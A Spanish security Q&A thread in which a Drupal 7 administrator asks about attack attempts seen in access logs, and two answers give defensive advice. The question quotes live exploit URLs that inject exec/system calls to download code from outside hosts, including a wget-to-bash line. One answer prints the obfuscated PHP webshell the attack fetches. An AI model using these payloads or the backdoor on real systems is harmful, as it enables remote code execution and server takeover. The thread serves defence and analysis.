¿Debo preocuparme por los intentos de ataque de usuario de Drupal 7?

3

En mis registros veo intentos regulares, algunas veces al día, como estos:

http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP
http://www.example.com/user/password/?name[%23post_render][]=system&name[%23markup]=wget+-O-+http://repo-linux.com/apply_patch.sh%7Cbash&name[%23type]=markup

Mi Drupal está parcheado a la última versión. ¿Me preocupo por eso? ¿Hay algo que pueda hacer para protegerme mejor?

    
pregunta MMT 21.04.2018 - 21:33
fuente

2 respuestas

0

Parece que el atacante intenta descargar el script desde este sitio web (https://pastebin.com/raw/PeBdUg98) a su servidor:

Esto es el script (es seguro hacer clic en este enlace):

<?php
    $st = 'return value';
    $cap='bas'.'e6'.'4_d'.'ec'.'ode';
    $c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // c = 'eval(bases64_decode('
    if(isset($_POST['uf']) && isset($_POST['pr'])) {  
        $arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);  
        array_walk($arr, strval($_POST['pr']), '');        
    }
?>

Y en la segunda llamada (a este script - es seguro hacer clic en el enlace) intenta ejecutar un parche en tu drupal.

No creo que pueda hacer que funcione, pero puedes imitar lo que está haciendo en un sitio web ficticio que verás y ver si realmente funciona.

Puede revisar sus registros de acceso y si todas las llamadas provienen de la misma IP, bloquéelo y haga una búsqueda IP inversa para intente encontrar más información sobre el atacante, posiblemente informe a su ISP.

Aunque no es phishing, también puede intentar enviar un informe aquí: enlace

Buen trabajo para mantenerte en la última versión de Drupal: si has instalado complementos, intenta mantener también su última versión.

    
respondido por el alfasin 22.04.2018 - 06:28
fuente
0

Hice una búsqueda, y lo más cercano que puedo encontrar a lo que está sucediendo está descrito aquí. Sin embargo, no pienses que es lo mismo Parece que su atacante está tratando de hacer inyecciones de comando, una de las cuales se extrae de pastebin, la otra de GitHub. Ver las fuentes que el atacante está tratando de incluir puede darle una mejor idea de lo que intentan explotar, pero tenga en cuenta que es un código malicioso. Visite e investigue bajo su propio riesgo y tomando las precauciones adecuadas.

No sé cómo funciona drupal en su núcleo, pero espero que una solicitud GET como la que está usando el atacante (ya que los parámetros están en la URL) no sea capaz de realizar ningún cambio. tratando de implementar.

Recomendaría revisar algunos registros del sistema para asegurarse de que no haya acceso al servidor y asegurarse de que no solo el CMS (Drupal) esté actualizado, sino también todos los complementos y temas. Si realiza una búsqueda, puede encontrar que incluso un complemento actualizado puede tener vulnerabilidades.

    
respondido por el SuperAdmin 21.04.2018 - 21:46
fuente

Lea otras preguntas en las etiquetas